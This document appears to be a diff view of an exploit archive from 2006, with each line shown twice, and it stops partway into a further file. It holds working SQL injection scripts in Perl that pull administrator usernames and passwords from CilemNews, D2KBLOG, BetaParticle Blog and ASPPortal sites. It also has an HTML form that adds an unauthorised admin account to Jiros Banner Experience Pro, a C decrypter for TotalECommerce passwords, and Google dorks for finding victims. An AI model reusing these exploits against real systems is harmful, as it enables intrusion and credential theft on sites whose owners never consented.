Save this code as .htm and then execute. Save this code as .htm and then execute.
# nukedx.com [2006-02-25] # nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25] # milw0rm.com [2006-02-25]

132
platforms/asp/webapps/1550.txt
View file

@ -1,66 +1,66 @@
Original advisory: http://www.nukedx.com/?viewdoc=18 Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx Advisory by: nukedx
Full PoC Full PoC
Explotation: Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage. [PageID]: must be working page id you can get some from frontpage.
<--Decrypter code--> <--Decrypter code-->
<--Note: This decrypter just decrypts default data <--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to this decrypter wont decrypt data so you need to
make your own decrypter make your own decrypter
--> -->
<--C Source--> <--C Source-->
/********************************************* /*********************************************
* TotalECommerce PWD Decrypter * * TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx * * Coded by |SaMaN| for nukedx *
* http://www.k9world.org * * http://www.k9world.org *
* IRC.K9World.Org * * IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 * *Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/ **********************************************/
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <ctype.h> #include <ctype.h>
int main() int main()
{ {
char buf[255]; char buf[255];
char buf2[255]; char buf2[255];
char buf3[255]; char buf3[255];
char *texto; char *texto;
char *vcrypt; char *vcrypt;
int i,x,z,t = 0; int i,x,z,t = 0;
char saman; char saman;
texto = buf; texto = buf;
vcrypt = buf2; vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n"); printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n"); printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: "); printf("%s", "Enter crypted password: ");
scanf("%200s", buf); scanf("%200s", buf);
if (!texto) if (!texto)
vcrypt = ""; vcrypt = "";
for (i = 0; i < strlen(texto); i++) for (i = 0; i < strlen(texto); i++)
{ {
if ((vcrypt == "") || (i > strlen(texto))) if ((vcrypt == "") || (i > strlen(texto)))
x = 1; x = 1;
else else
x = x + 1; x = x + 1;
t = buf[i]; t = buf[i];
z = 255 - t; z = 255 - t;
saman = toascii(z); saman = toascii(z);
snprintf(buf3, 250, "%c", saman); snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250); strncat(buf2, buf3, 250);
} }
printf("Result: %s\n", buf2); printf("Result: %s\n", buf2);
return; return;
} }
<--End of code--> <--End of code-->
<--Thanks |SaMaN| for decrypter--> <--Thanks |SaMaN| for decrypter-->
// milw0rm.com [2006-03-04] // milw0rm.com [2006-03-04]

136
platforms/asp/webapps/1562.pl
View file

@ -1,68 +1,68 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory> #Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10 #Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages... #googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket; use IO::Socket;
if(@ARGV < 2){ if(@ARGV < 2){
print " print "
+***********************************************************************+ +***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+ +Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> + + Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / + + Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] + + googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx + + Method found & Exploit scripted by nukedx +
+***********************************************************************+ +***********************************************************************+
"; ";
exit(); exit();
} }
#Local variables #Local variables
$cilemserver = $ARGV[0]; $cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg; $cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver; $cilemhost = "http://".$cilemserver;
$port = "80"; $port = "80";
$cilemdir = $ARGV[1]; $cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id="; $cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp"; $cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin"; $cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp; $cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n"; print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; $cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n"; print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n"; print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n"; print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n"; print $cilem "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$cilem>) { while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){ if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n"; print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ USERNAME: $1\n"; print "+ USERNAME: $1\n";
} }
if ($answer =~ /(.*?)<\/font><\/td>/) { if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n"; print "+ PASSWORD: $1\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n"; print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n"; print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n"; print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-03-07] # milw0rm.com [2006-03-07]

110
platforms/asp/webapps/1569.pl
View file

@ -1,55 +1,55 @@
#!/usr/bin/perl -w #!/usr/bin/perl -w
# D2KBLOG SQL injection # D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ] # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ] # Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net) # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
require LWP::UserAgent; require LWP::UserAgent;
require HTTP::Request; require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n"; print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n"; print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n"; print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n"; print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n"; print "\r\n=-=-=-==================================================================-=-=-=\r\n";
if (@ARGV != 2) if (@ARGV != 2)
{ {
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n"; print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit (); exit ();
} }
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,); my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
my $Path = $ARGV[0]; my $Path = $ARGV[0];
my $Page = $ARGV[1]; my $Page = $ARGV[1];
my $URL = "http://".$Path.$Page; my $URL = "http://".$Path.$Page;
print "|***| Connecting to ".$URL." ...\r\n"; print "|***| Connecting to ".$URL." ...\r\n";
$r = HTTP::Request->new(GET => $URL."?action=edit"); $r = HTTP::Request->new(GET => $URL."?action=edit");
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" ); $r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
$res = $ua->request($r); $res = $ua->request($r);
print "|***| Connected !\r\n"; print "|***| Connected !\r\n";
if ($res->is_success) { if ($res->is_success) {
print "|***| Extracting Username and Password ...\r\n\r\n"; print "|***| Extracting Username and Password ...\r\n\r\n";
my $results = $res->content; my $results = $res->content;
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; } while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n"; print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
} else { } else {
die "\r\n|***| ".$res->status_line; die "\r\n|***| ".$res->status_line;
} }
# milw0rm.com [2006-03-09] # milw0rm.com [2006-03-09]

114
platforms/asp/webapps/1571.htm
View file

@ -1,57 +1,57 @@
<html> <html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title> <title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000"> <body bgcolor="#000000">
<style> <style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;} .xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style> </style>
<script language="JavaScript"> <script language="JavaScript">
function jbxpl() { function jbxpl() {
if (document.xplt.victim.value=="") { if (document.xplt.victim.value=="") {
alert("Please enter site!"); alert("Please enter site!");
return false; return false;
} }
if (confirm("Are you sure?")) { if (confirm("Are you sure?")) {
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin"; xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
xplt.aName.value=document.xplt.aName.value; xplt.aName.value=document.xplt.aName.value;
xplt.aEmail.value=document.xplt.aEmail.value; xplt.aEmail.value=document.xplt.aEmail.value;
xplt.aPassword.value=document.xplt.aPassword.value; xplt.aPassword.value=document.xplt.aPassword.value;
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value; xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
xplt.aIsActive=document.xplt.aIsActive.value; xplt.aIsActive=document.xplt.aIsActive.value;
xplt.submit(); xplt.submit();
} }
} }
</script> </script>
<strong> <strong>
<font class="xpl" color="#00FF40"> <font class="xpl" color="#00FF40">
<pre> <pre>
<center> <center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19 You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u> Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/ Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/ For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();"> <form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl"> Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30"> <input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30"> <input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30"> <input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True"> <input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True"> <input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl"> <input type="submit" value="Send" class="xpl">
</form> </form>
</pre> </pre>
</font> </font>
</strong> </strong>
</body> </body>
</html> </html>
Save this code as .htm and then execute. Save this code as .htm and then execute.
# nukedx.com [2006-03-07] # nukedx.com [2006-03-07]
# milw0rm.com [2006-03-09] # milw0rm.com [2006-03-09]

134
platforms/asp/webapps/1589.pl
View file

@ -1,67 +1,67 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=20 #Original advisory: http://www.nukedx.com/?viewdoc=20
#Usage: beta.pl <host> <path> #Usage: beta.pl <host> <path>
#googledork: [ "Powered by bp blog" ] 9.710 pages.. #googledork: [ "Powered by bp blog" ] 9.710 pages..
use IO::Socket; use IO::Socket;
if(@ARGV != 2) { usage(); } if(@ARGV != 2) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-20\r\n"; print "\n- NukedX Security Advisory Nr.2006-20\r\n";
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n"; print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path>\r\n"; print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to BetaParticle ex: /blog\r\n"; print "- <path> -> Path to BetaParticle ex: /blog\r\n";
exit(); exit();
} }
sub exploit () { sub exploit () {
#Our variables... #Our variables...
$bpserver = $ARGV[0]; $bpserver = $ARGV[0];
$bpserver =~ s/(http:\/\/)//eg; $bpserver =~ s/(http:\/\/)//eg;
$bphost = "http://".$bpserver; $bphost = "http://".$bpserver;
$bpdir = $ARGV[1]; $bpdir = $ARGV[1];
$bpport = "80"; $bpport = "80";
$bptar = "template_gallery_detail.asp?fldGalleryID="; $bptar = "template_gallery_detail.asp?fldGalleryID=";
$bpfinal = "main.asp"; $bpfinal = "main.asp";
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1"; $bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
$bpreq = $bphost.$bpdir.$bptar.$bpxp; $bpreq = $bphost.$bpdir.$bptar.$bpxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $bpserver\r\n"; print "- Trying to connect: $bpserver\r\n";
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n"; $bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
print $bp "GET $bpreq HTTP/1.1\n"; print $bp "GET $bpreq HTTP/1.1\n";
print $bp "Accept: */*\n"; print $bp "Accept: */*\n";
print $bp "Referer: $bphost\n"; print $bp "Referer: $bphost\n";
print $bp "Accept-Language: tr\n"; print $bp "Accept-Language: tr\n";
print $bp "User-Agent: NukeZilla 4.3\n"; print $bp "User-Agent: NukeZilla 4.3\n";
print $bp "Cache-Control: no-cache\n"; print $bp "Cache-Control: no-cache\n";
print $bp "Host: $bpserver\n"; print $bp "Host: $bpserver\n";
print $bp "Connection: close\n\n"; print $bp "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$bp>) { while ($answer = <$bp>) {
if ($answer =~ /<h3>(.*?)<\/h3>/) { if ($answer =~ /<h3>(.*?)<\/h3>/) {
print "- Exploit succeed! Getting admin's information\r\n"; print "- Exploit succeed! Getting admin's information\r\n";
print "- Username: $1\r\n"; print "- Username: $1\r\n";
} }
if ($answer =~ /<p>(.*?)<\/p>/) { if ($answer =~ /<p>(.*?)<\/p>/) {
print "- Password: $1\r\n"; print "- Password: $1\r\n";
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n"; print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "- This version of BetaParticle is vulnerable too\r\n"; print "- This version of BetaParticle is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n"; print "- So please edit query by manually adding null data..\r\n";
exit(); exit();
} }
} }
print "- Exploit failed\n" print "- Exploit failed\n"
} }
# milw0rm.com [2006-03-18] # milw0rm.com [2006-03-18]

174
platforms/asp/webapps/1597.pl
View file

@ -1,87 +1,87 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=21 #Original advisory: http://www.nukedx.com/?viewdoc=21
#Usage: aspp.pl <host> <path> <user> #Usage: aspp.pl <host> <path> <user>
use IO::Socket; use IO::Socket;
use Math::BigInt; use Math::BigInt;
if(@ARGV != 3) { usage(); } if(@ARGV != 3) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-21\r\n"; print "\n- NukedX Security Advisory Nr.2006-21\r\n";
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path> <user>\r\n"; print "- Usage: $0 <host> <path> <user>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPPortal ex: /portal/\r\n"; print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
print "- <user> -> Username that you want password. ex: admin\r\n"; print "- <user> -> Username that you want password. ex: admin\r\n";
exit(); exit();
} }
sub decrypt () sub decrypt ()
{ {
$lp = length($appass); $lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V"; $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
if ($lp == 0) { die("- An error occurued\r\n"); } if ($lp == 0) { die("- An error occurued\r\n"); }
for ($i = 0; $i < $lp ; $i++) { for ($i = 0; $i < $lp ; $i++) {
$f = $lp - $i - 1; # Formula for getting character via substr... $f = $lp - $i - 1; # Formula for getting character via substr...
$n = substr($apkey,$f,1); $n = substr($apkey,$f,1);
$l = substr($appass,$f,1); $l = substr($appass,$f,1);
$appwd = chr(ord($n)^ord($l)).$appwd; $appwd = chr(ord($n)^ord($l)).$appwd;
} }
print "- Password decrypted as: $appwd\r\n"; print "- Password decrypted as: $appwd\r\n";
print "- Lets go $aphost$apdir$apfinal for login\r\n"; print "- Lets go $aphost$apdir$apfinal for login\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$apserver = $ARGV[0]; $apserver = $ARGV[0];
$apserver =~ s/(http:\/\/)//eg; $apserver =~ s/(http:\/\/)//eg;
$aphost = "http://".$apserver; $aphost = "http://".$apserver;
$apdir = $ARGV[1]; $apdir = $ARGV[1];
$apport = "80"; $apport = "80";
$aptar = "content/downloads/download_click.asp?downloadid="; $aptar = "content/downloads/download_click.asp?downloadid=";
$apfinal = "content/users/login.asp"; $apfinal = "content/users/login.asp";
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'"; $apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
$apreq = $aphost.$apdir.$aptar.$apxp; $apreq = $aphost.$apdir.$aptar.$apxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $apserver\r\n"; print "- Trying to connect: $apserver\r\n";
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; $ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
print $ap "GET $apreq HTTP/1.1\n"; print $ap "GET $apreq HTTP/1.1\n";
print $ap "Accept: */*\n"; print $ap "Accept: */*\n";
print $ap "Referer: $aphost\n"; print $ap "Referer: $aphost\n";
print $ap "Accept-Language: tr\n"; print $ap "Accept-Language: tr\n";
print $ap "User-Agent: NukeZilla\n"; print $ap "User-Agent: NukeZilla\n";
print $ap "Cache-Control: no-cache\n"; print $ap "Cache-Control: no-cache\n";
print $ap "Host: $apserver\n"; print $ap "Host: $apserver\n";
print $ap "Connection: close\n\n"; print $ap "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$ap>) { while ($answer = <$ap>) {
if ($answer =~ /string: &quot;(.*?)&quot;]'/) { if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
print "- Username: $ARGV[2]\r\n"; print "- Username: $ARGV[2]\r\n";
print "- Decrypting password....\r\n"; print "- Decrypting password....\r\n";
$appass = $1; $appass = $1;
$appass =~ s/(&quot;)/chr(34)/eg; $appass =~ s/(&quot;)/chr(34)/eg;
$appass =~ s/(&lt;)/chr(60)/eg; $appass =~ s/(&lt;)/chr(60)/eg;
$appass =~ s/(&gt;)/chr(62)/eg; $appass =~ s/(&gt;)/chr(62)/eg;
$appass =~ s/(&nbsp;)/chr(32)/eg; $appass =~ s/(&nbsp;)/chr(32)/eg;
decrypt(); decrypt();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "- This version of ASPPortal is vulnerable too\r\n"; print "- This version of ASPPortal is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n"; print "- So please edit query by manually adding null data..\r\n";
exit(); exit();
} }
} }
#Exploit failed... #Exploit failed...
print "- Exploit failed\n" print "- Exploit failed\n"
} }
# milw0rm.com [2006-03-20] # milw0rm.com [2006-03-20]

138
platforms/asp/webapps/1623.pl
View file

@ -1,69 +1,69 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=22 #Original advisory: http://www.nukedx.com/?viewdoc=22
#Usage: ezasp.pl <host> <path> #Usage: ezasp.pl <host> <path>
